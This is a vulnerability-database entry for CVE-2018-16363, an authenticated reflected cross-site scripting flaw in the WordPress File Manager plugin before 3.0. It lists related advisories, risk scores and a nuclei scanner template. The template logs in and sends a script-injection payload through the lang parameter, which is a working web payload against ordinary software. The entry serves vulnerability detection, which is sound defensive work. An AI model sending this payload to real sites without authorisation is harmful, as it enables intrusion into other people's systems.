WordPress File Manager < 3.0 - Cross-Site Scripting

Published: 09 Feb 2026 09:43:09. Reported by: ProjectDiscovery. Type: nuclei. Source: github.com. Views: 6.

Authenticated reflected cross-site scripting in the WordPress File Manager plugin before version 3.0 via the lang parameter.

Related entries (reporter, title, published):

  Circl       CVE-2018-16363                                                                             10 Feb 2026 21:02
  CNVD        WordPress mndpsingh287 File Manager plugin cross-site scripting vulnerability                11 Sep 2018 00:00
  CVE         CVE-2018-16363                                                                              7 Sep 2018 22:00
  Cvelist     CVE-2018-16363                                                                              7 Sep 2018 22:00
  EUVD        EUVD-2018-8209                                                                              7 Oct 2025 00:30
  NVD         CVE-2018-16363                                                                              7 Sep 2018 22:29
  OpenVAS     WordPress File Manager Plugin < 3.0 XSS Vulnerability                                       10 Feb 2025 00:00
  OSV         CVE-2018-16363                                                                              7 Sep 2018 22:29
  Patchstack  WordPress File Manager plugin <= 2.9 - Authenticated Cross-Site Scripting (XSS) vulnerability 9 Sep 2018 00:00
  Prion       Cross site request forgery (csrf)                                                           7 Sep 2018 22:29

Template:

id: CVE-2018-16363

info:
  name: WordPress File Manager < 3.0 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    WordPress File Manager plugin before 3.0 is vulnerable to authenticated reflected cross-site scripting (XSS) via the lang parameter in the admin dashboard. The parameter is directly echoed into a JavaScript context without proper sanitization.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16363
    - https://wpscan.com/vulnerability/65e4849b-6517-400d-884f-65234f58ab0c/
    - https://plugins.trac.wordpress.org/changeset/1936043
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16363
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2018,xss,wp-file-manager,wordpress,wp,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=wp_file_manager&lang=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "</script><script>alert(document.domain)</script>", "var fmlang", "wp-file-manager")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100c54762c0d9ce4414e3a31675a9add037e15e19046e7c02c81fbabbdc276287a102204e13d900170982a88337ffc1745c09601e57fd94e87fdab7b49fb176010869f7:922c64590222798bb761d5b6d8e72950


Scores (current as of 04 Feb 2026 19:27):
  Vulners AI Score: 5.1 (Medium risk)
  CVSS 2: 3.5
  CVSS 3: 5.4
  EPSS: 0.01383